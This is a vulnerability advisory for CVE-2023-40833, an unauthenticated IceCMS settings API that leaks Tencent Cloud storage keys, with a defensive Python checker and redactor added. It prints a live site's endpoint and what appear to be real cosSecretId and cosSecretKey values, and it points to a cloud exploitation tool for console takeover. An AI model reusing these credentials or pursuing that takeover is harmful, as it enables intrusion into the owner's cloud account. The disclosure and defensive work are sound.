Headline
CVE-2023-40833: Unauthenticated settings API in Thecosy IceCMS v1.0.0 leaks Tencent Cloud credentials
An issue in Thecosy IceCMS v.1.0.0 allows a remote attacker to gain privileges via the Id and key parameters in getCosSetting.
[CVE ID]
CVE-2023-40833
[PRODUCT]
icecms
[VERSION]
v1.0.0
[Vulnerability TYPE]
Insecure Permissions
[Root Cause]
IceCMS serves its site-settings API without any authentication, so anyone can request it. In my local test environment the endpoint is http://localhost:8181/WebSitting/getSetting; on the official website it is https://www.macwk.cc/api/Sitting/getCosSetting.
The official website returned the following content:
{
"id": 1,
"beian": "鲁ICP备19036164号",
"banquan": "Macwk.com © 2019. All rights reserved.",
"comment_show": false,
"sitTitle": "CMS",
"sitLogo": "",
"imageFormat": false,
"cosIntage": "https://icewk-1305088812.cos.ap-nanjing.myqcloud.com",
"cosBucketName": "icewk-1305088812",
"cosSecretId": "AKIDjDRQDrRXcA7TfQNk9LO3EJchbFeneY4U",
"cosSecretKey": "blgxyuiIfnCLaZXH5i6FB4gmDPilY8zb",
"cosClientConfig": "ap-nanjing",
"isCos": false
}
An attacker can read the Tencent Cloud API credential pair, cosSecretId and cosSecretKey, straight from this response; note that the keys are returned even though isCos is false.
The cosIntage URL (a *.cos.ap-nanjing.myqcloud.com host) shows that the site uses Tencent Cloud Object Storage (COS), Tencent Cloud's counterpart to AWS S3, and the AKID-prefixed SecretId with no accompanying session token is a long-lived Tencent Cloud account API key, not a temporary credential.
With that key pair, a cloud exploitation tool such as CF (https://wiki.teamssix.com/cf/) can enumerate and take over every Tencent Cloud service the key is authorised for; if the key belongs to the root account or to a user with broad CAM permissions, that amounts to taking over the whole console.
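The following Python script is an added example, not IceCMS project code and not part of the original advisory. It checks a getSetting/getCosSetting response body for the credential fields named above and shows the hardened serialisation a public endpoint should return, with the secret fields dropped rather than blanked. The sample response (with fake key values), the AKID-prefix pattern used to recognise a Tencent SecretId, and the helper names are assumptions made for this example.

```python
"""Check an IceCMS settings response for leaked cloud credentials and
produce the redacted form that a public endpoint should return.

Added example, not IceCMS code. Field names follow the JSON shown in the
advisory; the sample values below are constructed and not real keys."""
import json
import re
import urllib.request

# Settings fields that must never reach an unauthenticated client.
SECRET_FIELDS = {"cosSecretId", "cosSecretKey"}

# Assumption for this example: a Tencent Cloud SecretId is "AKID" followed by
# 32 alphanumerics, matching the shape of the value quoted in the advisory.
TENCENT_SECRET_ID_RE = re.compile(r"^AKID[A-Za-z0-9]{32}$")

# Constructed sample modelled on the advisory's response; key values are fake.
SAMPLE_RESPONSE = json.dumps({
    "id": 1,
    "sitTitle": "CMS",
    "cosIntage": "https://example-1250000000.cos.ap-nanjing.myqcloud.com",
    "cosBucketName": "example-1250000000",
    "cosSecretId": "AKIDEXAMPLEEXAMPLEEXAMPLEEXAMPLE0000",
    "cosSecretKey": "ExampleSecretKeyExampleSecretKey",
    "cosClientConfig": "ap-nanjing",
    "isCos": False,
})


def fetch_settings(url: str, timeout: float = 10.0) -> str:
    """Fetch a settings endpoint without credentials, exactly as an
    anonymous attacker would (not used by the offline sample run)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def find_leaked_secrets(body: str) -> dict:
    """Return {field: value} for every secret field that is present and
    non-empty in a settings JSON body."""
    data = json.loads(body)
    leaked = {}
    for field in SECRET_FIELDS:
        value = data.get(field)
        if isinstance(value, str) and value.strip():
            leaked[field] = value
    return leaked


def is_tencent_secret_id(value: str) -> bool:
    """True when a value has the shape of a Tencent Cloud API SecretId."""
    return bool(TENCENT_SECRET_ID_RE.match(value))


def redact_settings(body: str) -> str:
    """Hardened serialisation: drop the secret fields entirely (blanking them
    would still advertise that credentials are stored) and return JSON that
    is safe to serve from an unauthenticated endpoint."""
    data = json.loads(body)
    public = {k: v for k, v in data.items() if k not in SECRET_FIELDS}
    return json.dumps(public, ensure_ascii=False)


def check_response(body: str) -> dict:
    """Summarise the credential exposure of one response body."""
    leaked = find_leaked_secrets(body)
    return {
        "vulnerable": bool(leaked),
        "fields": sorted(leaked),
        "tencent_secret_id": any(is_tencent_secret_id(v) for v in leaked.values()),
    }


if __name__ == "__main__":
    # Offline run against the constructed sample; pass the output of
    # fetch_settings(url) instead to check a live instance you own.
    print(check_response(SAMPLE_RESPONSE))
    print(check_response(redact_settings(SAMPLE_RESPONSE)))
```

The redaction drops the fields on the server side before serialisation; the real fix is to never hand the settings entity with secrets to the public endpoint at all, and to rotate any key that has already been served.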
[Impact]
Taking over the official user's Tencent Cloud console: the attacker can power off the servers and read everything on them, including source code. The actual blast radius depends on the CAM permissions attached to the leaked key, but a root-account key grants full control of every service in the account.